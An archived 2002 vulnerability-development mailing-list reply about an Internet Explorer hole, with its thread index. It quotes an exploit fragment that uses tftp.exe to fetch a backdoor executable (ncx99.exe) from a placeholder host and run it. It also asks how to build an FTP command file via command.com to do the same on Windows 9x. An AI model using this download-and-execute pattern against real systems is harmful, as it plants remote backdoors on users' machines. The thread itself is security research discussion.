Vulnerability Development mailing list archives
Re: Rather large MSIE-hole
From: Felipe Franciosi <franciozzy () terra com br>
Date: Thu, 14 Mar 2002 08:41:01 -0300
var programName=new Array( 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe', 'c:/winnt/system32/ncx99.exe', );
MS Windows 9x don't have trivial ftp client by default... I was thinking how this could be exploitable on these versions... The FTP client offers the option to read a text-file containing line separated commands. But I couldn't get to work something like: var prog... 'c:/command.com /c echo bin > c:/list.txt', 'c:/command.com /c echo GET something >> c:/list.txt' this won't create 'list.txt'... Any ideas why? Or how some could get around it? Regards, Felipe -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Felipe Franciosi paradoxo networking felipe at paradoxo dot org http://www.paradoxo.org Porto Alegre - RS Fone: (55)(51)9123-0557 UIN - 33596050 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Current thread:
- Rather large MSIE-hole Magnus Bodin (Mar 12)
- Re: Rather large MSIE-hole Jon Zobrist (Mar 12)
- Disabling the MSIE hole. Suresh P (Mar 12)
- Re: Disabling the MSIE hole. Bob at firstcodings (Mar 13)
- RE: Disabling the MSIE hole. leon (Mar 13)
- Re: Disabling the MSIE hole. Magnus Bodin (Mar 13)
- Re: Rather large MSIE-hole Magnus Bodin (Mar 12)
- Re: Rather large MSIE-hole NyQuist (Mar 13)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 13)
- Re: Rather large MSIE-hole methodic (Mar 14)
- Re: Rather large MSIE-hole Felipe Franciosi (Mar 14)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole jon schatz (Mar 14)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 15)
- Re: Rather large MSIE-hole NyQuist (Mar 13)
- Re: [Re: Rather large MSIE-hole] another variant (NAV and Finjan block this) David Barnett (Mar 16)
- <Possible follow-ups>
- Re: Rather large MSIE-hole foo BAR (Mar 12)
- RE: Rather large MSIE-hole Jim Harrison (SPG) (Mar 13)
- Re: Rather large MSIE-hole Raul Dias (Mar 13)
- RE: Rather large MSIE-hole Maarten Oosterink (Mar 14)
- Re: Rather large MSIE-hole Syzop (Mar 14)